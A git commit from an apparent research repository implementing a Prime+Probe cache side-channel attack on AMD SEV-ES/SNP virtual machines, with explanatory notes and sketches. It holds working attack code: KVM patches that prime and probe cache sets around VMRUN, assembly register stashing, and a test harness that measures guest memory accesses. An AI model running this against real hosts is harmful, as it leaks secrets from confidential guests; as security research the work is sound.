cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc
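For readers new to the underlying primitive: Prime+Probe fills the monitored cache sets with attacker-owned lines (prime), lets the victim run, then times re-accesses to those lines (probe). A slow reload means the victim evicted that line, revealing which cache set, and therefore which addresses, the victim touched. The repository implements this in kernel space around VMRUN; the following user-space sketch is purely illustrative (hypothetical code, not part of this repository) and assumes an 8-way, 64-set L1D with 64-byte lines:

    /*
     * Illustrative Prime+Probe on the L1D (hypothetical user-space code,
     * not from this repository). With 64 sets of 64-byte lines, addresses
     * 4096 bytes apart map to the same set.
     */
    #include <stdint.h>
    #include <stdio.h>
    #include <x86intrin.h>

    #define WAYS     8
    #define SETS     64
    #define LINESIZE 64

    static uint8_t evset[WAYS * SETS * LINESIZE]
        __attribute__((aligned(SETS * LINESIZE)));

    static uint64_t
    probe_set(int set)
    {
        volatile uint8_t *p;
        uint64_t start, end;
        unsigned int aux;
        int way;

        start = __rdtscp(&aux);
        for (way = 0; way < WAYS; way++) {
            /* reload our lines; evicted ones miss and cost extra cycles */
            p = &evset[(way * SETS + set) * LINESIZE];
            (void) *p;
        }
        end = __rdtscp(&aux);

        return end - start;
    }

    int
    main(void)
    {
        int set, way;

        /* prime: claim every way of every monitored set */
        for (set = 0; set < SETS; set++)
            for (way = 0; way < WAYS; way++)
                *(volatile uint8_t *) &evset[(way * SETS + set) * LINESIZE] = 1;

        /* ... victim would run here and evict some of our lines ... */

        /* probe: a slow set implies a victim access to that set */
        for (set = 0; set < SETS; set++)
            printf("set %2d: %3lu cycles\n", set,
                (unsigned long) probe_set(set));

        return 0;
    }

The kernel module applies the same pattern, but primes and probes from ring 0 with interrupts disabled, so that almost nothing but the guest runs inside the measurement window.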

commit 0a23cb0a512c3984aa0d68f4ec4a5c0c0d55a430
parent 29054b8937435a4e736d14b26329eafc759eb152
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu,  1 Sep 2022 23:53:36 +0200

sev-es: Fixed OOM symptom, prime & probe working (but not directly around vmrun yet)

Diffstat:
M .gitignore      |   1 +
M patch.diff      | 241 +++++++++++++++++++++++++++++++++++++++++++++++--------------------------------
M test/.gitignore |   2 ++
M test/sev-es.c   | 125 ++++++++++++++++++++++++++++++++++++-------------------------------------------
M test/sev.c      |   2 +-
5 files changed, 204 insertions(+), 167 deletions(-)

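Orientation for the diff below: most of the churn is in patch.diff, which is itself a diff that this repo applies to the host kernel's KVM. The key functional change is that the prime and probe steps now also bracket the SEV-ES entry path (__svm_sev_es_vcpu_run). Reduced to its control flow, the instrumented svm_vcpu_enter_exit() does roughly the following (condensed sketch of the hunks below, not compilable on its own; cachepc_prime, cachepc_probe, cachepc_save_msrmts, cachepc_msrmts and cachepc_ds are the helpers this repository patches into KVM):

    /*
     * Condensed sketch of the instrumented svm_vcpu_enter_exit() from
     * patch.diff below -- not a drop-in replacement.
     */
    if (sev_es_guest(svm->vcpu.kvm)) {
        cacheline *next;
        int cpu;

        memset(cachepc_msrmts, 0, 64 * 2);   /* clear per-set results */

        cpu = get_cpu();                     /* stay on one physical core */
        local_irq_disable();                 /* keep noise out of the window */
        WARN_ON(cpu != 2);                   /* harness pins the vCPU to core 2 */

        next = cachepc_prime(cachepc_ds);    /* prime the monitored sets */
        __svm_sev_es_vcpu_run(svm->vmcb_pa); /* VMRUN: the SEV-ES guest executes */
        cachepc_probe(next);                 /* probe: evictions mark guest accesses */
        cachepc_save_msrmts(cachepc_ds);     /* export counts to the test harness */

        local_irq_enable();
        put_cpu();
    }

Note the WARN_ON(cpu != 2): the measurement only makes sense if the vCPU thread stays pinned to a fixed physical core, since the cache sets being primed are per core. The vmenter.S changes serve the same goal from the assembly side, stashing general-purpose registers in XMM registers so that the prime/probe helpers can be entered around vmrun without touching the stack.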
diff --git a/.gitignore b/.gitignore
@@ -4,3 +4,4 @@ push.sh
 *.o.cmd
 *.o
 *.out
+*.swp
diff --git a/patch.diff b/patch.diff
@@ -31,8 +31,25 @@ index b804444e16d4..17167ccfca22 100644
 obj-$(CONFIG_KVM) += kvm.o
 obj-$(CONFIG_KVM_INTEL) += kvm-intel.o
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index 87e1c66228f7..d7da36e12da6 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -572,10 +572,12 @@ static int sev_launch_update_vmsa(struct kvm *kvm, struct kvm_sev_cmd *argp)
+ struct vcpu_svm *svm = to_svm(kvm->vcpus[i]);
+
+ /* Perform some pre-encryption checks against the VMSA */
++ printk(KERN_WARNING "Vincent: Pre sev_es_sync_vmsa\n");
+ ret = sev_es_sync_vmsa(svm);
+ if (ret)
+ goto e_free;
+
++ printk(KERN_WARNING "Vincent: Post sev_es_sync_vmsa\n");
+ /*
+ * The LAUNCH_UPDATE_VMSA command will perform in-place
+ * encryption of the VMSA memory content (i.e it will write
diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
-index 7b3cfbe8f7e3..cb60859f7d17 100644
+index 7b3cfbe8f7e3..c7952eab7c6d 100644
 --- a/arch/x86/kvm/svm/svm.c
 +++ b/arch/x86/kvm/svm/svm.c
 @@ -2,6 +2,8 @@
@@ -44,9 +61,30 @@ index 7b3cfbe8f7e3..cb60859f7d17 100644
 #include "irq.h"
 #include "mmu.h"
 #include "kvm_cache_regs.h"
-@@ -3751,7 +3753,14 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
+@@ -3131,7 +3133,7 @@ static void dump_vmcb(struct kvm_vcpu *vcpu)
+
+ if (!dump_invalid_vmcb) {
+ pr_warn_ratelimited("set kvm_amd.dump_invalid_vmcb=1 to dump internal KVM state.\n");
+- return;
++ // return;
+ }
+
+ pr_err("VMCB Control Area:\n");
+@@ -3749,9 +3751,26 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
+
+ lockdep_hardirqs_on(CALLER_ADDR0);
+
 if (sev_es_guest(svm->vcpu.kvm)) {
++ memset(cachepc_msrmts, 0, 64 * 2);
++ int cpu = get_cpu();
++ local_irq_disable();
++ WARN_ON(cpu != 2);
++ cacheline *next;
++ next = cachepc_prime(cachepc_ds);
 __svm_sev_es_vcpu_run(svm->vmcb_pa);
++ cachepc_probe(next);
++ cachepc_save_msrmts(cachepc_ds);
++ local_irq_enable();
++ put_cpu();
 } else {
+ memset(cachepc_msrmts, 0, 64 * 2);
+ int cpu = get_cpu();
@@ -59,7 +97,7 @@ index 7b3cfbe8f7e3..cb60859f7d17 100644
 
 #ifdef CONFIG_X86_64
 native_wrmsrl(MSR_GS_BASE, svm->host.gs_base);
-@@ -3785,8 +3794,12 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
+@@ -3785,8 +3804,12 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
 
 static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
 {
@@ -73,11 +111,20 @@ index 7b3cfbe8f7e3..cb60859f7d17 100644
 svm->vmcb->save.rax = vcpu->arch.regs[VCPU_REGS_RAX];
 svm->vmcb->save.rsp = vcpu->arch.regs[VCPU_REGS_RSP];
 svm->vmcb->save.rip = vcpu->arch.regs[VCPU_REGS_RIP];
+@@ -3888,7 +3911,7 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
+
+ svm->vmcb->control.tlb_ctl = TLB_CONTROL_DO_NOTHING;
+ vmcb_mark_all_clean(svm->vmcb);
+-
++ printk(KERN_WARNING "Vincent: svm->vmcb exit code %d\n", svm->vmcb->control.exit_code);
+ /* if exit due to PF check for async PF */
+ if (svm->vmcb->control.exit_code == SVM_EXIT_EXCP_BASE + PF_VECTOR)
+ svm->vcpu.arch.apf.host_apf_flags =
diff --git a/arch/x86/kvm/svm/vmenter.S b/arch/x86/kvm/svm/vmenter.S
-index 6feb8c08f45a..2f259db92037 100644
+index 6feb8c08f45a..eb0ea02ef187 100644
 --- a/arch/x86/kvm/svm/vmenter.S
 +++ b/arch/x86/kvm/svm/vmenter.S
-@@ -27,14 +27,53 @@
+@@ -27,14 +27,74 @@
 #define VCPU_R15 __VCPU_REGS_R15 * WORD_SIZE
 #endif
 
+.macro push_xmm grp xmm
+ vmovq \grp, \xmm
+.endm
+
+.macro swap_xmm grp xmm
+ vmovq \grp, %xmm15
+ vmovq \xmm, \grp
+ vmovq %xmm15, \xmm
+.endm
+
+.macro push_all
+ push_xmm %rax, %xmm0
+ push_xmm %rbx, %xmm1
+ push_xmm %rcx, %xmm2
+ push_xmm %rdx, %xmm3
+ push_xmm %rbp, %xmm4
+ push_xmm %rsp, %xmm5
+ push_xmm %rdi, %xmm6
+ push_xmm %rsi, %xmm7
+ push_xmm %r8,  %xmm8
+ push_xmm %r9,  %xmm9
+ push_xmm %r10, %xmm10
+ push_xmm %r11, %xmm11
+ push_xmm %r12, %xmm12
+ push_xmm %r13, %xmm13
+ push_xmm %r14, %xmm14
+.endm
+
+.macro swap_all
+ swap_xmm %rax, %xmm0
+ swap_xmm %rbx, %xmm1
+ swap_xmm %rcx, %xmm2
+ swap_xmm %rdx, %xmm3
+ swap_xmm %rbp, %xmm4
+ swap_xmm %rsp, %xmm5
+ swap_xmm %rdi, %xmm6
+ swap_xmm %rsi, %xmm7
+ swap_xmm %r8,  %xmm8
+ swap_xmm %r9,  %xmm9
+ swap_xmm %r10, %xmm10
+ swap_xmm %r11, %xmm11
+ swap_xmm %r12, %xmm12
+ swap_xmm %r13, %xmm13
+ swap_xmm %r14, %xmm14
+.endm
+
+.macro barrier
+ mfence
+ mov $0x80000005,%eax
+ cpuid
+.endm
+
 /**
 * __svm_vcpu_run - Run a vCPU via a transition to SVM guest mode
 * @vmcb_pa: unsigned long
 * @regs: unsigned long * (to guest registers)
 */
 SYM_FUNC_START(__svm_vcpu_run)
+ push_all
+
 push %_ASM_BP
 #ifdef CONFIG_X86_64
 push %r15
-@@ -45,6 +84,7 @@ SYM_FUNC_START(__svm_vcpu_run)
+@@ -45,6 +105,7 @@ SYM_FUNC_START(__svm_vcpu_run)
 push %edi
 push %esi
 #endif
+
 push %_ASM_BX
 
 /* Save @regs. */
-@@ -85,8 +125,87 @@ SYM_FUNC_START(__svm_vcpu_run)
+@@ -85,8 +146,25 @@ SYM_FUNC_START(__svm_vcpu_run)
 jne 3f
 ud2
 _ASM_EXTABLE(1b, 2b)
+
+3:
+ swap_all
+ mov cachepc_ds, %rsi
+ mov 0x8(%rsi), %r15
+ lea sev_prime_ret(%rip), %rdi
+ jmp cachepc_prime_vcall+1 // skip stack pushes
+sev_prime_ret:
+ swap_all
+
+ vmrun %_ASM_AX
+
+ swap_all
+ mov %r15, %rsi
+ lea sev_probe_ret(%rip), %rdi
+ jmp cachepc_probe_vcall+6 // skip stack pushs
+sev_probe_ret:
+ swap_all
-3: vmrun %_ASM_AX
 jmp 5f
 4: cmpb $0, kvm_rebooting
 jne 5f
-@@ -100,7 +219,7 @@ SYM_FUNC_START(__svm_vcpu_run)
+@@ -100,7 +178,7 @@ SYM_FUNC_START(__svm_vcpu_run)
 ud2
 _ASM_EXTABLE(5b, 6b)
 7:
-+ barrier
++ barrier
 
 #ifdef CONFIG_RETPOLINE
 /* IMPORTANT: Stuff the RSB immediately after VM-Exit, before RET! */
-@@ -166,6 +285,11 @@ SYM_FUNC_START(__svm_vcpu_run)
+@@ -166,6 +244,11 @@ SYM_FUNC_START(__svm_vcpu_run)
 pop %edi
 #endif
 pop %_ASM_BP
+
+ barrier
+
 ret
 SYM_FUNC_END(__svm_vcpu_run)
 
+@@ -174,6 +257,8 @@ SYM_FUNC_END(__svm_vcpu_run)
 * @vmcb_pa: unsigned long
 */
 SYM_FUNC_START(__svm_sev_es_vcpu_run)
+ push_all
+
 push %_ASM_BP
 #ifdef CONFIG_X86_64
 push %r15
+@@ -190,7 +275,28 @@ SYM_FUNC_START(__svm_sev_es_vcpu_run)
 mov %_ASM_ARG1, %_ASM_AX
 sti
 
-1: vmrun %_ASM_AX
+1:
+
+// swap_all
+// mov cachepc_ds, %rsi
+// mov 0x8(%rsi), %r15
+// lea sev_es_prime_ret(%rip), %rdi
+// jmp cachepc_prime_vcall+1 // skip stack pushes
+//sev_es_prime_ret:
+// swap_all
+
+// // TEST r15 dependance
+// movq $0x41414141, %r15
+
+ vmrun %_ASM_AX
+
+// swap_all
+// mov %r15, %rsi
+// lea sev_es_probe_ret(%rip), %rdi
+// jmp cachepc_probe_vcall+6 // skip stack pushs
+//sev_es_probe_ret:
+// swap_all
+
 jmp 3f
 2: cmpb $0, kvm_rebooting
 jne 3f
diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
index 4097d028c3ab..81685bd567a2 100644
--- a/arch/x86/kvm/x86.c
diff --git a/test/.gitignore b/test/.gitignore
@@ -2,3 +2,5 @@ access
 eviction
 kvm
 sev
+sev-es
+sev-snp
diff --git a/test/sev-es.c b/test/sev-es.c
@@ -40,7 +40,7 @@
 #define TARGET_SET 15
 
 struct kvm {
- int fd, vmfd, vcpufd;
+ int vmfd, vcpufd;
 void *mem;
 size_t memsize;
 struct kvm_run *run;
@@ -130,8 +130,8 @@ vm_guest_with(void)
 while (1) {
 asm volatile("mov (%[v]), %%bl"
 : : [v] "r" (TARGET_CACHE_LINESIZE * TARGET_SET));
- asm volatile("out %%al, (%%dx)" : : );
- //asm volatile("hlt");
+ //asm volatile("out %%al, (%%dx)" : : );
+ asm volatile("hlt");
 //asm volatile("rep; vmmcall\n\r");
 }
 }
@@ -140,8 +140,8 @@ __attribute__((section("guest_without"))) void
 vm_guest_without(void)
 {
 while (1) {
- //asm volatile("hlt");
- asm volatile("out %%al, (%%dx)" : : );
+ asm volatile("hlt");
+ //asm volatile("out %%al, (%%dx)" : : );
 }
 }
@@ -264,7 +264,7 @@ sev_guest_state(int vmfd, uint32_t handle)
 }
 
 void
-sev_debug_encrypt(int vmfd, void *src, void *dst, size_t size)
+sev_dbg_encrypt(int vmfd, void *dst, void *src, size_t size)
 {
 struct kvm_sev_dbg enc;
 int ret, fwerr;
@@ -278,7 +278,7 @@ sev_debug_encrypt(int vmfd, void *src, void *dst, size_t size)
 }
 
 void
-sev_debug_decrypt(int vmfd, void *src, void *dst, size_t size)
+sev_dbg_decrypt(int vmfd, void *dst, void *src, size_t size)
 {
 struct kvm_sev_dbg enc;
 int ret, fwerr;
@@ -329,24 +329,10 @@ sev_kvm_init(struct kvm *kvm, size_t ramsize, void *code_start, void *code_stop)
 if (ret < 0) errx(1, "KVM_SEV_ES_INIT: (%s) %s",
 strerror(errno), sev_fwerr_str(fwerr));
 
- /* Generate encryption keys and set policy */
- memset(&start, 0, sizeof(start));
- start.handle = 0;
- start.policy = 1 << 2; /* require ES */
- ret = sev_ioctl(kvm->vmfd, KVM_SEV_LAUNCH_START, &start, &fwerr);
- if (ret < 0) errx(1, "KVM_SEV_LAUNCH_START: (%s) %s",
- strerror(errno), sev_fwerr_str(fwerr));
-
-
-
-
-
-
-
 /* Create virtual cpu */
 kvm->vcpufd = ioctl(kvm->vmfd, KVM_CREATE_VCPU, 0);
 if (kvm->vcpufd < 0) err(1, "KVM_CREATE_VCPU");
 
+ /* Map the shared kvm_run structure and following data */
 ret = ioctl(kvm_dev, KVM_GET_VCPU_MMAP_SIZE, NULL);
 if (ret < 0) err(1, "KVM_GET_VCPU_MMAP_SIZE");
@@ -355,8 +341,8 @@ sev_kvm_init(struct kvm *kvm, size_t ramsize, void *code_start, void *code_stop)
 kvm->run = mmap(NULL, ret, PROT_READ | PROT_WRITE, MAP_SHARED, kvm->vcpufd, 0);
 if (!kvm->run) err(1, "mmap vcpu");
-
- /* Initialize segment regs */
+
+ /* Initialize segment regs */
 memset(&sregs, 0, sizeof(sregs));
 ret = ioctl(kvm->vcpufd, KVM_GET_SREGS, &sregs);
 if (ret < 0) err(1, "KVM_GET_SREGS");
@@ -364,46 +350,46 @@ sev_kvm_init(struct kvm *kvm, size_t ramsize, void *code_start, void *code_stop)
 sregs.cs.selector = 0;
 ret = ioctl(kvm->vcpufd, KVM_SET_SREGS, &sregs);
 if (ret < 0) err(1, "KVM_SET_SREGS");
-
- /* Initialize rest of registers */
+
+ /* Initialize rest of registers */
 memset(&regs, 0, sizeof(regs));
- regs.rip = 0x0;
- regs.rsp = kvm->memsize - 1;
- regs.rbp = kvm->memsize - 1;
- regs.rax = 0;
- regs.rdx = 0;
- regs.rflags = 0x2;
+ regs.rip = 0;
+ regs.rsp = kvm->memsize - 8;
+ regs.rbp = kvm->memsize - 8;
 ret = ioctl(kvm->vcpufd, KVM_SET_REGS, &regs);
 if (ret < 0) err(1, "KVM_SET_REGS");
 
- /* Prepare the vm memory (by encrypting it) */
+
+ /* Generate encryption keys and set policy */
+ memset(&start, 0, sizeof(start));
+ start.handle = 0;
+ start.policy = 1 << 2; /* require ES */
+ ret = sev_ioctl(kvm->vmfd, KVM_SEV_LAUNCH_START, &start, &fwerr);
+ if (ret < 0) errx(1, "KVM_SEV_LAUNCH_START: (%s) %s",
+ strerror(errno), sev_fwerr_str(fwerr));
+
+ /* Prepare the vm memory (by encrypting it) */
 memset(&update, 0, sizeof(update));
 update.uaddr = (uintptr_t) kvm->mem;
 update.len = ramsize;
 ret = sev_ioctl(kvm->vmfd, KVM_SEV_LAUNCH_UPDATE_DATA, &update, &fwerr);
 if (ret < 0) errx(1, "KVM_SEV_LAUNCH_UPDATE_DATA: (%s) %s",
 strerror(errno), sev_fwerr_str(fwerr));
-
+
 /* Prepare the vm save area */
 ret = sev_ioctl(kvm->vmfd, KVM_SEV_LAUNCH_UPDATE_VMSA, NULL, &fwerr);
- if (ret < 0) errx(1, "KVM_SEV_LAUNCH_UPDATE_VMSA: (%s) %s",
- strerror(errno), sev_fwerr_str(fwerr));
- /* Collect a measurement (necessary) */
- msrmt = sev_get_measure(kvm->vmfd);
+ if (ret < 0) errx(1, "KVM_SEV_LAUNCH_UPDATE_VMSA: (%s) %s",strerror(errno), sev_fwerr_str(fwerr));
+
+ /* Collect a measurement (necessary) */
+ msrmt = sev_get_measure(kvm->vmfd);
 free(msrmt);
 
+ /* Finalize launch process */
 ret = sev_ioctl(kvm->vmfd, KVM_SEV_LAUNCH_FINISH, 0, &fwerr);
 if (ret < 0) errx(1, "KVM_SEV_LAUNCH_FINISH: (%s) %s",
- strerror(errno), sev_fwerr_str(fwerr));
+ strerror(errno), sev_fwerr_str(fwerr));
 ret = sev_guest_state(kvm->vmfd, start.handle);
 if (ret != GSTATE_RUNNING)
 errx(1, "Bad guest state: %s", sev_gstate_str(fwerr));
-
-
-
-
-
-
-
 }
@@ -449,36 +435,26 @@ print_counts(uint16_t *counts)
 }
 
 uint16_t *
-collect(const char *prefix, void *code_start, void *code_stop)
+collect(struct kvm *kvm)
 {
 struct kvm_regs regs;
- struct kvm kvm;
- uint16_t *counts;
 int ret;
 
- sev_kvm_init(&kvm, 64 * 64 * 8 * 2, code_start, code_stop);
-
- /* run vm twice, use count without initial stack setup */
- ret = ioctl(kvm.vcpufd, KVM_RUN, NULL);
- ret = ioctl(kvm.vcpufd, KVM_RUN, NULL);
+ ret = ioctl(kvm->vcpufd, KVM_RUN, NULL);
 if (ret < 0) err(1, "KVM_RUN");
 
- if (kvm.run->exit_reason == KVM_EXIT_MMIO) {
+ if (kvm->run->exit_reason == KVM_EXIT_MMIO) {
 memset(&regs, 0, sizeof(regs));
- ret = ioctl(kvm.vcpufd, KVM_GET_REGS, &regs);
+ ret = ioctl(kvm->vcpufd, KVM_GET_REGS, &regs);
 if (ret < 0) err(1, "KVM_GET_REGS");
- errx(1, "Victim access OOB: %llu %08llx => %02X\n",
- kvm.run->mmio.phys_addr, regs.rip,
- ((uint8_t *)kvm.mem)[regs.rip]);
- } else if (kvm.run->exit_reason != KVM_EXIT_IO) {
- errx(1, "KVM died: %i\n", kvm.run->exit_reason);
+ errx(1, "KVM_EXTI_MMIO: Victim %s at 0x%08llx: rip=0x%08llx\n",
+ kvm->run->mmio.is_write ? "write" : "read",
+ kvm->run->mmio.phys_addr, regs.rip);
+ } else if (kvm->run->exit_reason != KVM_EXIT_HLT) {
+ errx(1, "KVM died: %i\n", kvm->run->exit_reason);
 }
 
- counts = read_counts();
-
- sev_kvm_deinit(&kvm);
-
- return counts;
+ return read_counts();
 }
@@ -486,6 +462,7 @@ main(int argc, const char **argv)
 {
 uint16_t without_access[SAMPLE_COUNT][64];
 uint16_t with_access[SAMPLE_COUNT][64];
+ struct kvm kvm_without_access, kvm_with_access;
 uint16_t *counts, *baseline;
 uint32_t arg;
 int i, k, ret;
@@ -518,12 +495,21 @@ main(int argc, const char **argv)
 for (k = 0; k < 64; k++)
 baseline[k] = UINT16_MAX;
 
+ sev_kvm_init(&kvm_with_access, 64 * 64 * 8 * 2, __start_guest_with, __stop_guest_with);
+ sev_kvm_init(&kvm_without_access, 64 * 64 * 8 * 2, __start_guest_without, __stop_guest_without);
+
+ /* one run to get into while loop (after stack setup) */
+ ioctl(kvm_with_access.vcpufd, KVM_RUN, NULL);
+ ioctl(kvm_without_access.vcpufd, KVM_RUN, NULL);
+
 for (i = 0; i < SAMPLE_COUNT; i++) {
- counts = collect("without", __start_guest_without, __stop_guest_without);
+ //printf("Running guest without\n");
+ counts = collect(&kvm_without_access);
 memcpy(without_access[i], counts, 64 * sizeof(uint16_t));
 free(counts);
 
- counts = collect("with", __start_guest_with, __stop_guest_with);
+ //printf("Running guest with\n");
+ counts = collect(&kvm_with_access);
 memcpy(with_access[i], counts, 64 * sizeof(uint16_t));
 free(counts);
@@ -551,6 +537,9 @@ main(int argc, const char **argv)
 //assert(without_access[i][TARGET_SET] == 0);
 }
 
+ sev_kvm_deinit(&kvm_with_access);
+ sev_kvm_deinit(&kvm_without_access);
+
 free(baseline);
 
 close(cachepc_dev);
diff --git a/test/sev.c b/test/sev.c
@@ -357,7 +357,7 @@ sev_kvm_init(struct kvm *kvm, size_t ramsize, void *code_start, void *code_stop)
 if (ret != GSTATE_RUNNING)
 errx(1, "Bad guest state: %s", sev_gstate_str(fwerr));
 
- /* Create virtual cpu */
+ /* Create virtual cpu core */
 kvm->vcpufd = ioctl(kvm->vmfd, KVM_CREATE_VCPU, 0);
 if (kvm->vcpufd < 0) err(1, "KVM_CREATE_VCPU");
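A summary of the test/sev-es.c restructuring, since it is spread over several hunks above: collect() no longer creates and destroys a VM per sample. Both guests are created once, run once to get past their stack setup, and then sampled alternately; the guests now exit via hlt instead of port I/O, so collect() accepts KVM_EXIT_HLT. Condensed (error handling elided):

    struct kvm kvm_with_access, kvm_without_access;
    uint16_t *counts;
    int i;

    sev_kvm_init(&kvm_with_access, 64 * 64 * 8 * 2,
        __start_guest_with, __stop_guest_with);
    sev_kvm_init(&kvm_without_access, 64 * 64 * 8 * 2,
        __start_guest_without, __stop_guest_without);

    /* one run per guest to get past stack setup, into the while loop */
    ioctl(kvm_with_access.vcpufd, KVM_RUN, NULL);
    ioctl(kvm_without_access.vcpufd, KVM_RUN, NULL);

    for (i = 0; i < SAMPLE_COUNT; i++) {
        counts = collect(&kvm_without_access); /* guest halts, counts read out */
        memcpy(without_access[i], counts, 64 * sizeof(uint16_t));
        free(counts);

        counts = collect(&kvm_with_access);
        memcpy(with_access[i], counts, 64 * sizeof(uint16_t));
        free(counts);
    }

    sev_kvm_deinit(&kvm_with_access);
    sev_kvm_deinit(&kvm_without_access);

Recreating an SEV-ES VM for every sample accumulated resources across iterations, which is presumably the OOM symptom named in the commit message; reusing the two VMs also keeps samples comparable, since every KVM_RUN now resumes the same steady-state guest loop.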